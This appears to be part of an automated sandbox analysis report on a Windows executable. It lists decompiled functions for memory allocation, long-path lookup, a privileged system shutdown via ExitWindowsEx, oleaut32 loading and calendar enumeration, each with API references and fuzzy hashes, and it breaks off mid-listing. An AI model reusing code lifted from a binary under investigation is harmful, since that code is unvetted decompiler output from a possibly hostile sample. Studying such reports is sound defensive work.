                                                            • Source File: 00000005.00000002.320866610.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000005.00000002.320858032.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000005.00000002.321002080.00000000004B7000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000005.00000002.321026547.00000000004C0000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000005.00000002.321038528.00000000004C4000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000005.00000002.321065372.00000000004C6000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: ErrorFileLast
                                                            • String ID:
                                                            • API String ID: 734332943-0
                                                            • Opcode ID: 09339d9670a81d77462708df034512c3e9d7a5ee9c38b49a5b5d33688a33920b
                                                            • Instruction ID: ae15968ab9cd064c61534cde2c099b4aac4a7b80231ae1acb8e6de6fcc6ca8bf
                                                            • Opcode Fuzzy Hash: 09339d9670a81d77462708df034512c3e9d7a5ee9c38b49a5b5d33688a33920b
                                                            • Instruction Fuzzy Hash: 58C04C61300210478B04EEBBD5C190666E85B582157414466B904DB216E67DD9158615
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0040CAA4, Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 100%
                                                            			E0040CAA4() {
				intOrPtr _v16;
				struct _SYSTEM_INFO* _t3;

				GetSystemInfo(_t3); // executed
				return _v16;
			}





                                                            0x0040caa8
                                                            0x0040cab4

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.320866610.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000005.00000002.320858032.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000005.00000002.321002080.00000000004B7000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000005.00000002.321026547.00000000004C0000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000005.00000002.321038528.00000000004C4000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000005.00000002.321065372.00000000004C6000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: InfoSystem
                                                            • String ID:
                                                            • API String ID: 31276548-0
                                                            • Opcode ID: 9dd1f6b5bb1b0da35443b21aa4a452d0333aba70165927044b368234b0936b7a
                                                            • Instruction ID: 4f21eec972071caf62eebbeb90550a79e4d7a8082c8b53f17589c9beddeb5e45
                                                            • Opcode Fuzzy Hash: 9dd1f6b5bb1b0da35443b21aa4a452d0333aba70165927044b368234b0936b7a
                                                            • Instruction Fuzzy Hash: CDA012984088002AC404AB194C4340F39C819C1114FC40224745CB62C2E61D866403DB
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00403BCC, Relevance: 1.3, APIs: 1, Instructions: 41memoryCOMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 100%
                                                            			E00403BCC(signed int __eax) {
				void* _t4;
				intOrPtr _t7;
				signed int _t8;
				void** _t10;
				void* _t12;
				void* _t14;

				_t8 = __eax;
				E00403B60(__eax);
				_t4 = VirtualAlloc(0, 0x13fff0, 0x1000, 4); // executed
				if(_t4 == 0) {
					 *0x4bbaf0 = 0;
					return 0;
				} else {
					_t10 =  *0x4bbadc; // 0x4bbad8
					_t14 = _t4;
					 *_t14 = 0x4bbad8;
					 *0x4bbadc = _t4;
					 *(_t14 + 4) = _t10;
					 *_t10 = _t4;
					_t12 = _t14 + 0x13fff0;
					 *((intOrPtr*)(_t12 - 4)) = 2;
					 *0x4bbaf0 = 0x13ffe0 - _t8;
					_t7 = _t12 - _t8;
					 *0x4bbaec = _t7;
					 *(_t7 - 4) = _t8 | 0x00000002;
					return _t7;
				}
			}









                                                            0x00403bce
                                                            0x00403bd0
                                                            0x00403be3
                                                            0x00403bea
                                                            0x00403c3c
                                                            0x00403c45
                                                            0x00403bec
                                                            0x00403bec
                                                            0x00403bf2
                                                            0x00403bf4
                                                            0x00403bfa
                                                            0x00403bff
                                                            0x00403c02
                                                            0x00403c06
                                                            0x00403c11
                                                            0x00403c1e
                                                            0x00403c26
                                                            0x00403c28
                                                            0x00403c35
                                                            0x00403c39
                                                            0x00403c39

                                                            APIs
                                                            • VirtualAlloc.KERNEL32(00000000,0013FFF0,00001000,00000004,?,000001A3,004041E3,000000FF,00404788,00000000,0040BBE7,00000000,0040C0F5,00000000,0040C3B7,00000000), ref: 00403BE3
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.320866610.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000005.00000002.320858032.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000005.00000002.321002080.00000000004B7000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000005.00000002.321026547.00000000004C0000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000005.00000002.321038528.00000000004C4000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000005.00000002.321065372.00000000004C6000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: AllocVirtual
                                                            • String ID:
                                                            • API String ID: 4275171209-0
                                                            • Opcode ID: cb8f292e3956ad7a1a5e0c92f19b435d8be5366ce3ed5ca5418bf36ecf0e0e1a
                                                            • Instruction ID: ee114c9f451a66722181258b66a673b4223530c98f306d9f720d31c7abdd50f3
                                                            • Opcode Fuzzy Hash: cb8f292e3956ad7a1a5e0c92f19b435d8be5366ce3ed5ca5418bf36ecf0e0e1a
                                                            • Instruction Fuzzy Hash: 71F087F2F002404FE7249F799D40742BAE8E709315B10827EE908EB799E7F488018B88
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00403CF6, Relevance: 1.3, APIs: 1, Instructions: 41COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 96%
                                                            			E00403CF6(void* __eax) {
				struct _MEMORY_BASIC_INFORMATION _v44;
				void* _v48;
				void* _t13;
				int _t20;
				void* _t22;
				signed int _t26;
				signed int _t29;
				signed int _t30;
				void* _t34;
				intOrPtr _t35;
				signed int _t39;
				void* _t41;
				void* _t42;

				_push(_t29);
				_t42 = _t41 + 0xffffffdc;
				_t34 = __eax - 0x10;
				E00403C48();
				_t13 = _t34;
				 *_t42 =  *_t13;
				_v48 =  *((intOrPtr*)(_t13 + 4));
				_t26 =  *(_t13 + 0xc);
				if((_t26 & 0x00000008) != 0) {
					_t22 = _t34;
					_t39 = _t26 & 0xfffffff0;
					_t30 = 0;
					while(1) {
						VirtualQuery(_t22,  &_v44, 0x1c);
						if(VirtualFree(_t22, 0, 0x8000) == 0) {
							break;
						}
						_t35 = _v44.RegionSize;
						if(_t39 > _t35) {
							_t39 = _t39 - _t35;
							_t22 = _t22 + _t35;
							continue;
						}
						goto L10;
					}
					_t30 = _t30 | 0xffffffff;
				} else {
					_t20 = VirtualFree(_t34, 0, 0x8000); // executed
					if(_t20 == 0) {
						_t30 = _t29 | 0xffffffff;
					} else {
						_t30 = 0;
					}
				}
				L10:
				if(_t30 == 0) {
					 *_v48 =  *_t42;
					 *( *_t42 + 4) = _v48;
				}
				 *0x4bdb78 = 0;
				return _t30;
			}
















                                                            0x00403cfa
                                                            0x00403cfc
                                                            0x00403d01
                                                            0x00403d04
                                                            0x00403d09
                                                            0x00403d0d
                                                            0x00403d13
                                                            0x00403d17
                                                            0x00403d1d
                                                            0x00403d39
                                                            0x00403d3d
                                                            0x00403d40
                                                            0x00403d42
                                                            0x00403d4a
                                                            0x00403d5e
                                                            0x00000000
                                                            0x00000000
                                                            0x00403d65
                                                            0x00403d6b
                                                            0x00403d6d
                                                            0x00403d6f
                                                            0x00000000
                                                            0x00403d6f
                                                            0x00000000
                                                            0x00403d6b
                                                            0x00403d60
                                                            0x00403d1f
                                                            0x00403d27
                                                            0x00403d2e
                                                            0x00403d34
                                                            0x00403d30
                                                            0x00403d30
                                                            0x00403d30
                                                            0x00403d2e
                                                            0x00403d73
                                                            0x00403d75
                                                            0x00403d7e
                                                            0x00403d87
                                                            0x00403d87
                                                            0x00403d8a
                                                            0x00403d9a

                                                            APIs
                                                            • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00403D27
                                                            • VirtualQuery.KERNEL32(?,?,0000001C), ref: 00403D4A
                                                            • VirtualFree.KERNEL32(?,00000000,00008000,?,?,0000001C), ref: 00403D57
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.320866610.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000005.00000002.320858032.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000005.00000002.321002080.00000000004B7000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000005.00000002.321026547.00000000004C0000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000005.00000002.321038528.00000000004C4000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000005.00000002.321065372.00000000004C6000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: Virtual$Free$Query
                                                            • String ID:
                                                            • API String ID: 778034434-0
                                                            • Opcode ID: 70118730a538275f8eba95c50282fe5a7e92951222106072b386c800723d93a4
                                                            • Instruction ID: 6789628300bf7aa479fe1b8b627d7daf3441881ad106b622f2e79b23e4dc796b
                                                            • Opcode Fuzzy Hash: 70118730a538275f8eba95c50282fe5a7e92951222106072b386c800723d93a4
                                                            • Instruction Fuzzy Hash: C5F06D353046005FD311DF1AC844B17BBE9EFC5711F15C67AE888973A1E635DD018796
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Non-executed Functions

                                                            Function 0040A928, Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 140stringlibraryfileCOMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 78%
                                                            			E0040A928(short* __eax, intOrPtr __edx) {
				short* _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				void* _v20;
				struct _WIN32_FIND_DATAW _v612;
				short _v1134;
				signed int _t50;
				signed int _t51;
				void* _t55;
				signed int _t88;
				signed int _t89;
				intOrPtr* _t90;
				signed int _t101;
				signed int _t102;
				short* _t112;
				struct HINSTANCE__* _t113;
				short* _t115;
				short* _t116;
				void* _t117;

				_v12 = __edx;
				_v8 = __eax;
				_v16 = _v8;
				_t113 = GetModuleHandleW(L"kernel32.dll");
				if(_t113 == 0) {
					L4:
					if( *_v8 != 0x5c) {
						_t115 = _v8 + 4;
						goto L10;
					} else {
						if( *((short*)(_v8 + 2)) == 0x5c) {
							_t116 = E0040A904(_v8 + 4);
							if( *_t116 != 0) {
								_t14 = _t116 + 2; // 0x2
								_t115 = E0040A904(_t14);
								if( *_t115 != 0) {
									L10:
									_t88 = _t115 - _v8;
									_t89 = _t88 >> 1;
									if(_t88 < 0) {
										asm("adc ebx, 0x0");
									}
									_t43 = _t89 + 1;
									if(_t89 + 1 <= 0x105) {
										E0040A34C( &_v1134, _v8, _t43);
										while( *_t115 != 0) {
											_t112 = E0040A904(_t115 + 2);
											_t50 = _t112 - _t115;
											_t51 = _t50 >> 1;
											if(_t50 < 0) {
												asm("adc eax, 0x0");
											}
											if(_t51 + _t89 + 1 <= 0x105) {
												_t55 =  &_v1134 + _t89 + _t89;
												_t101 = _t112 - _t115;
												_t102 = _t101 >> 1;
												if(_t101 < 0) {
													asm("adc edx, 0x0");
												}
												E0040A34C(_t55, _t115, _t102 + 1);
												_v20 = FindFirstFileW( &_v1134,  &_v612);
												if(_v20 != 0xffffffff) {
													FindClose(_v20);
													if(lstrlenW( &(_v612.cFileName)) + _t89 + 1 + 1 <= 0x105) {
														 *((short*)(_t117 + _t89 * 2 - 0x46a)) = 0x5c;
														E0040A34C( &_v1134 + _t89 + _t89 + 2,  &(_v612.cFileName), 0x105 - _t89 - 1);
														_t89 = _t89 + lstrlenW( &(_v612.cFileName)) + 1;
														_t115 = _t112;
														continue;
													}
												}
											}
											goto L24;
										}
										E0040A34C(_v8,  &_v1134, _v12);
									}
								}
							}
						}
					}
				} else {
					_t90 = GetProcAddress(_t113, "GetLongPathNameW");
					if(_t90 == 0) {
						goto L4;
					} else {
						_push(0x105);
						_push( &_v1134);
						_push(_v8);
						if( *_t90() == 0) {
							goto L4;
						} else {
							E0040A34C(_v8,  &_v1134, _v12);
						}
					}
				}
				L24:
				return _v16;
			}






















                                                            0x0040a934
                                                            0x0040a937
                                                            0x0040a93d
                                                            0x0040a94a
                                                            0x0040a94e
                                                            0x0040a98d
                                                            0x0040a994
                                                            0x0040a9d4
                                                            0x00000000
                                                            0x0040a996
                                                            0x0040a99e
                                                            0x0040a9af
                                                            0x0040a9b5
                                                            0x0040a9bb
                                                            0x0040a9c3
                                                            0x0040a9c9
                                                            0x0040a9d7
                                                            0x0040a9d9
                                                            0x0040a9dc
                                                            0x0040a9de
                                                            0x0040a9e0
                                                            0x0040a9e0
                                                            0x0040a9e3
                                                            0x0040a9eb
                                                            0x0040a9fc
                                                            0x0040aac3
                                                            0x0040aa0e
                                                            0x0040aa12
                                                            0x0040aa14
                                                            0x0040aa16
                                                            0x0040aa18
                                                            0x0040aa18
                                                            0x0040aa23
                                                            0x0040aa33
                                                            0x0040aa37
                                                            0x0040aa39
                                                            0x0040aa3b
                                                            0x0040aa3d
                                                            0x0040aa3d
                                                            0x0040aa43
                                                            0x0040aa5b
                                                            0x0040aa62
                                                            0x0040aa68
                                                            0x0040aa84
                                                            0x0040aa86
                                                            0x0040aaad
                                                            0x0040aabf
                                                            0x0040aac1
                                                            0x00000000
                                                            0x0040aac1
                                                            0x0040aa84
                                                            0x0040aa62
                                                            0x00000000
                                                            0x0040aa23
                                                            0x0040aad9
                                                            0x0040aad9
                                                            0x0040a9eb
                                                            0x0040a9c9
                                                            0x0040a9b5
                                                            0x0040a99e
                                                            0x0040a950
                                                            0x0040a95b
                                                            0x0040a95f
                                                            0x00000000
                                                            0x0040a961
                                                            0x0040a961
                                                            0x0040a96c
                                                            0x0040a970
                                                            0x0040a975
                                                            0x00000000
                                                            0x0040a977
                                                            0x0040a983
                                                            0x0040a983
                                                            0x0040a975
                                                            0x0040a95f
                                                            0x0040aade
                                                            0x0040aae7

                                                            APIs
                                                            • GetModuleHandleW.KERNEL32(kernel32.dll,004162BC,?,?), ref: 0040A945
                                                            • GetProcAddress.KERNEL32(00000000,GetLongPathNameW), ref: 0040A956
                                                            • FindFirstFileW.KERNEL32(?,?,kernel32.dll,004162BC,?,?), ref: 0040AA56
                                                            • FindClose.KERNEL32(?,?,?,kernel32.dll,004162BC,?,?), ref: 0040AA68
                                                            • lstrlenW.KERNEL32(?,?,?,?,kernel32.dll,004162BC,?,?), ref: 0040AA74
                                                            • lstrlenW.KERNEL32(?,?,?,?,?,kernel32.dll,004162BC,?,?), ref: 0040AAB9
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.320866610.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000005.00000002.320858032.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000005.00000002.321002080.00000000004B7000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000005.00000002.321026547.00000000004C0000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000005.00000002.321038528.00000000004C4000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000005.00000002.321065372.00000000004C6000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: Findlstrlen$AddressCloseFileFirstHandleModuleProc
                                                            • String ID: GetLongPathNameW$\$kernel32.dll
                                                            • API String ID: 1930782624-3908791685
                                                            • Opcode ID: 2e7747c66ca0daf9bf73dcf24122f514d4f35ae2d915a4be054088bbf24f0c4d
                                                            • Instruction ID: 0568a8f2c4c85ac628058e700237ad117df8c3680498263a44950cac296231c5
                                                            • Opcode Fuzzy Hash: 2e7747c66ca0daf9bf73dcf24122f514d4f35ae2d915a4be054088bbf24f0c4d
                                                            • Instruction Fuzzy Hash: 7841A071B003189BCB20DE98CD85A9EB3B5AB44310F1485B69945F72C1EB7CAE51CF4A
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 004AF110, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 42shutdownCOMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 91%
                                                            			E004AF110() {
				int _v4;
				struct _TOKEN_PRIVILEGES _v16;
				void* _v20;
				int _t7;

				if(E0041FF2C() != 2) {
					L5:
					_t7 = ExitWindowsEx(2, 0);
					asm("sbb eax, eax");
					return _t7 + 1;
				}
				if(OpenProcessToken(GetCurrentProcess(), 0x28,  &_v20) != 0) {
					LookupPrivilegeValueW(0, L"SeShutdownPrivilege",  &(_v16.Privileges));
					_v16.PrivilegeCount = 1;
					_v4 = 2;
					AdjustTokenPrivileges(_v20, 0,  &_v16, 0, 0, 0);
					if(GetLastError() == 0) {
						goto L5;
					}
					return 0;
				}
				return 0;
			}







                                                            0x004af11b
                                                            0x004af178
                                                            0x004af17c
                                                            0x004af184
                                                            0x00000000
                                                            0x004af186
                                                            0x004af12d
                                                            0x004af13f
                                                            0x004af144
                                                            0x004af14c
                                                            0x004af166
                                                            0x004af172
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x004af174
                                                            0x00000000

                                                            APIs
                                                            • GetCurrentProcess.KERNEL32(00000028), ref: 004AF120
                                                            • OpenProcessToken.ADVAPI32(00000000,00000028), ref: 004AF126
                                                            • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,00000028), ref: 004AF13F
                                                            • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000002,00000000,00000000,00000000), ref: 004AF166
                                                            • GetLastError.KERNEL32(?,00000000,00000002,00000000,00000000,00000000), ref: 004AF16B
                                                            • ExitWindowsEx.USER32(00000002,00000000), ref: 004AF17C
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.320866610.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000005.00000002.320858032.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000005.00000002.321002080.00000000004B7000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000005.00000002.321026547.00000000004C0000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000005.00000002.321038528.00000000004C4000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000005.00000002.321065372.00000000004C6000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: ProcessToken$AdjustCurrentErrorExitLastLookupOpenPrivilegePrivilegesValueWindows
                                                            • String ID: SeShutdownPrivilege
                                                            • API String ID: 107509674-3733053543
                                                            • Opcode ID: dbd0b99069aff0d6788c9efc2bbd2c2bb6d4dae2a155ecb9c3cc528dabbfbf9f
                                                            • Instruction ID: 15d82be9bc359c8987119149698676c325083c88dcd196a4f2f9cd1a299335ef
                                                            • Opcode Fuzzy Hash: dbd0b99069aff0d6788c9efc2bbd2c2bb6d4dae2a155ecb9c3cc528dabbfbf9f
                                                            • Instruction Fuzzy Hash: 75F06D70684301B5E610A6F2CD07F6B21C89B56B58FA00D3EBA84E91C2D7BDD81D42BF
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00427874, Relevance: 42.1, APIs: 1, Strings: 23, Instructions: 141COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 100%
                                                            			E00427874() {
				struct HINSTANCE__* _v8;
				intOrPtr _t46;
				void* _t91;

				_v8 = GetModuleHandleW(L"oleaut32.dll");
				 *0x4c1134 = E00427848("VariantChangeTypeEx", E00427264, _t91);
				 *0x4c1138 = E00427848("VarNeg", E004272AC, _t91);
				 *0x4c113c = E00427848("VarNot", E004272AC, _t91);
				 *0x4c1140 = E00427848("VarAdd", E004272B8, _t91);
				 *0x4c1144 = E00427848("VarSub", E004272B8, _t91);
				 *0x4c1148 = E00427848("VarMul", E004272B8, _t91);
				 *0x4c114c = E00427848("VarDiv", E004272B8, _t91);
				 *0x4c1150 = E00427848("VarIdiv", E004272B8, _t91);
				 *0x4c1154 = E00427848("VarMod", E004272B8, _t91);
				 *0x4c1158 = E00427848("VarAnd", E004272B8, _t91);
				 *0x4c115c = E00427848("VarOr", E004272B8, _t91);
				 *0x4c1160 = E00427848("VarXor", E004272B8, _t91);
				 *0x4c1164 = E00427848("VarCmp", E004272C4, _t91);
				 *0x4c1168 = E00427848("VarI4FromStr", E004272D0, _t91);
				 *0x4c116c = E00427848("VarR4FromStr", E0042733C, _t91);
				 *0x4c1170 = E00427848("VarR8FromStr", E004273AC, _t91);
				 *0x4c1174 = E00427848("VarDateFromStr", E0042741C, _t91);
				 *0x4c1178 = E00427848("VarCyFromStr", E0042748C, _t91);
				 *0x4c117c = E00427848("VarBoolFromStr", E004274FC, _t91);
				 *0x4c1180 = E00427848("VarBstrFromCy", E0042757C, _t91);
				 *0x4c1184 = E00427848("VarBstrFromDate", E00427624, _t91);
				_t46 = E00427848("VarBstrFromBool", E004277B4, _t91);
				 *0x4c1188 = _t46;
				return _t46;
			}






                                                            0x00427882
                                                            0x00427896
                                                            0x004278ac
                                                            0x004278c2
                                                            0x004278d8
                                                            0x004278ee
                                                            0x00427904
                                                            0x0042791a
                                                            0x00427930
                                                            0x00427946
                                                            0x0042795c
                                                            0x00427972
                                                            0x00427988
                                                            0x0042799e
                                                            0x004279b4
                                                            0x004279ca
                                                            0x004279e0
                                                            0x004279f6
                                                            0x00427a0c
                                                            0x00427a22
                                                            0x00427a38
                                                            0x00427a4e
                                                            0x00427a5e
                                                            0x00427a64
                                                            0x00427a6b

                                                            APIs
                                                            • GetModuleHandleW.KERNEL32(oleaut32.dll), ref: 0042787D
                                                              • Part of subcall function 00427848: GetProcAddress.KERNEL32(00000000), ref: 00427861
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.320866610.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000005.00000002.320858032.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000005.00000002.321002080.00000000004B7000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000005.00000002.321026547.00000000004C0000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000005.00000002.321038528.00000000004C4000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000005.00000002.321065372.00000000004C6000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: AddressHandleModuleProc
                                                            • String ID: VarAdd$VarAnd$VarBoolFromStr$VarBstrFromBool$VarBstrFromCy$VarBstrFromDate$VarCmp$VarCyFromStr$VarDateFromStr$VarDiv$VarI4FromStr$VarIdiv$VarMod$VarMul$VarNeg$VarNot$VarOr$VarR4FromStr$VarR8FromStr$VarSub$VarXor$VariantChangeTypeEx$oleaut32.dll
                                                            • API String ID: 1646373207-1918263038
                                                            • Opcode ID: 3edd394f2c42f1ee7728dbbd964d2d48b2f407ea9c7b21d0b846acf91e36c10d
                                                            • Instruction ID: afb448a43cf45882875cbd5333393c9475fd06a837c60371df2c799b3a2ca9d5
                                                            • Opcode Fuzzy Hash: 3edd394f2c42f1ee7728dbbd964d2d48b2f407ea9c7b21d0b846acf91e36c10d
                                                            • Instruction Fuzzy Hash: 4741442078D2689A53007BAA3C0692A7B9CD64A7243E0E07FF5048B766DF7CAC40867D
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0041E7CC, Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 194threadCOMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 82%
                                                            			E0041E7CC(void* __eax, void* __ebx, signed int __edx, void* __edi, void* __esi, long long __fp0) {
				signed int _v8;
				char _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr* _t32;
				signed int _t53;
				signed int _t56;
				signed int _t71;
				signed int _t78;
				signed int* _t82;
				signed int _t85;
				void* _t93;
				signed int _t94;
				signed int _t95;
				signed int _t98;
				signed int _t99;
				void* _t105;
				intOrPtr _t106;
				signed int _t109;
				intOrPtr _t116;
				intOrPtr _t117;
				void* _t131;
				void* _t132;
				signed int _t134;
				void* _t136;
				void* _t137;
				void* _t139;
				void* _t140;
				intOrPtr _t141;
				void* _t142;
				long long _t161;

				_t161 = __fp0;
				_t126 = __edi;
				_t109 = __edx;
				_t139 = _t140;
				_t141 = _t140 + 0xfffffff0;
				_push(__edi);
				_v12 = 0;
				_v8 = __edx;
				_t93 = __eax;
				_push(_t139);
				_push(0x41ea61);
				_push( *[fs:eax]);
				 *[fs:eax] = _t141;
				_t32 =  *0x4ba590; // 0x4bb8f8
				_t144 =  *_t32;
				if( *_t32 == 0) {
					E0040554C(0x1a);
				}
				E00406688(E0040690C( *0x4be7e4, 0, _t126), _t109 | 0xffffffff, _t144);
				_push(_t139);
				_push(0x41ea44);
				_push( *[fs:edx]);
				 *[fs:edx] = _t141;
				 *0x4be7dc = 0;
				_push(0);
				E00409C00();
				_t142 = _t141 + 4;
				E0041E034(_t93, 0x41ea7c, 0x100b,  &_v12);
				_t127 = E0041A1C4(0x41ea7c, 1, _t144);
				if(_t127 + 0xfffffffd - 3 >= 0) {
					__eflags = _t127 - 0xffffffffffffffff;
					if(_t127 - 0xffffffffffffffff < 0) {
						 *0x4be7dc = 1;
						_push(1);
						E00409C00();
						_t142 = _t142 + 4;
						E00407E00( *0x4be7e0, L"B.C.");
						 *((intOrPtr*)( *0x4be7e0 + 4)) = 0;
						_t71 =  *0x4be7e0;
						 *((intOrPtr*)(_t71 + 8)) = 0xffc00000;
						 *((intOrPtr*)(_t71 + 0xc)) = 0xc1dfffff;
						E0041C1C4(1, 1, 1, __eflags, _t161);
						_v20 = E00405790();
						_v16 = 1;
						asm("fild qword [ebp-0x10]");
						 *((long long*)( *0x4be7e0 + 0x10)) = _t161;
						asm("wait");
						EnumCalendarInfoW(E0041E6A4, GetThreadLocale(), _t127, 4);
						_t78 =  *0x4be7e0;
						__eflags = _t78;
						if(_t78 != 0) {
							_t82 = _t78 - 4;
							__eflags = _t82;
							_t78 =  *_t82;
						}
						_t134 = _t78 - 1;
						__eflags = _t134;
						if(_t134 > 0) {
							_t98 = 1;
							do {
								 *((intOrPtr*)( *0x4be7e0 + 4 + (_t98 + _t98 * 2) * 8)) = 0xffffffff;
								_t98 = _t98 + 1;
								_t134 = _t134 - 1;
								__eflags = _t134;
							} while (_t134 != 0);
						}
						EnumCalendarInfoW(E0041E73C, GetThreadLocale(), _t127, 3);
					}
				} else {
					EnumCalendarInfoW(E0041E6A4, GetThreadLocale(), _t127, 4);
					_t85 =  *0x4be7e0;
					if(_t85 != 0) {
						_t85 =  *(_t85 - 4);
					}
					_t136 = _t85 - 1;
					if(_t136 >= 0) {
						_t137 = _t136 + 1;
						_t99 = 0;
						do {
							 *((intOrPtr*)( *0x4be7e0 + 4 + (_t99 + _t99 * 2) * 8)) = 0xffffffff;
							_t99 = _t99 + 1;
							_t137 = _t137 - 1;
						} while (_t137 != 0);
					}
					EnumCalendarInfoW(E0041E73C, GetThreadLocale(), _t127, 3);
				}
				_t94 =  *0x4be7e0;
				if(_t94 != 0) {
					_t94 =  *(_t94 - 4);
				}
				_push(_t94);
				E00409C00();
				_t53 =  *0x4be7e0;
				if(_t53 != 0) {
					_t53 =  *(_t53 - 4);
				}
				_t131 = _t53 - 1;
				if(_t131 >= 0) {
					_t132 = _t131 + 1;
					_t95 = 0;
					do {
						_t127 = _t95 + _t95 * 2;
						_t106 =  *0x416e18; // 0x416e1c
						E00408F5C( *((intOrPtr*)(_v8 + 0xbc)) + (_t95 + _t95 * 2) * 8, _t106,  *0x4be7e0 + (_t95 + _t95 * 2) * 8);
						_t95 = _t95 + 1;
						_t132 = _t132 - 1;
					} while (_t132 != 0);
				}
				_t116 =  *0x41e600; // 0x41e604
				E00409D24(0x4be7e0, _t116);
				_t56 =  *0x4be7e0;
				if(_t56 != 0) {
					_t56 =  *(_t56 - 4);
				}
				 *0x4be7dc = _t56;
				_pop(_t117);
				_pop(_t105);
				 *[fs:eax] = _t117;
				_push(0x41ea4b);
				return E00406868( *0x4be7e4, _t105, _t127);
			}


































                                                            0x0041e7cc
                                                            0x0041e7cc
                                                            0x0041e7cc
                                                            0x0041e7cd
                                                            0x0041e7cf
                                                            0x0041e7d4
                                                            0x0041e7d7
                                                            0x0041e7da
                                                            0x0041e7dd
                                                            0x0041e7e1
                                                            0x0041e7e2
                                                            0x0041e7e7
                                                            0x0041e7ea
                                                            0x0041e7ed
                                                            0x0041e7f2
                                                            0x0041e7f5
                                                            0x0041e7f9
                                                            0x0041e7f9
                                                            0x0041e80b
                                                            0x0041e812
                                                            0x0041e813
                                                            0x0041e818
                                                            0x0041e81b
                                                            0x0041e820
                                                            0x0041e826
                                                            0x0041e837
                                                            0x0041e83c
                                                            0x0041e84f
                                                            0x0041e861
                                                            0x0041e86b
                                                            0x0041e8c8
                                                            0x0041e8cb
                                                            0x0041e8d6
                                                            0x0041e8dc
                                                            0x0041e8ed
                                                            0x0041e8f2
                                                            0x0041e8ff
                                                            0x0041e90b
                                                            0x0041e90e
                                                            0x0041e913
                                                            0x0041e91a
                                                            0x0041e92d
                                                            0x0041e937
                                                            0x0041e93a
                                                            0x0041e93d
                                                            0x0041e945
                                                            0x0041e948
                                                            0x0041e957
                                                            0x0041e95c
                                                            0x0041e961
                                                            0x0041e963
                                                            0x0041e965
                                                            0x0041e965
                                                            0x0041e968
                                                            0x0041e968
                                                            0x0041e96c
                                                            0x0041e96d
                                                            0x0041e96f
                                                            0x0041e971
                                                            0x0041e976
                                                            0x0041e97f
                                                            0x0041e987
                                                            0x0041e988
                                                            0x0041e988
                                                            0x0041e988
                                                            0x0041e976
                                                            0x0041e999
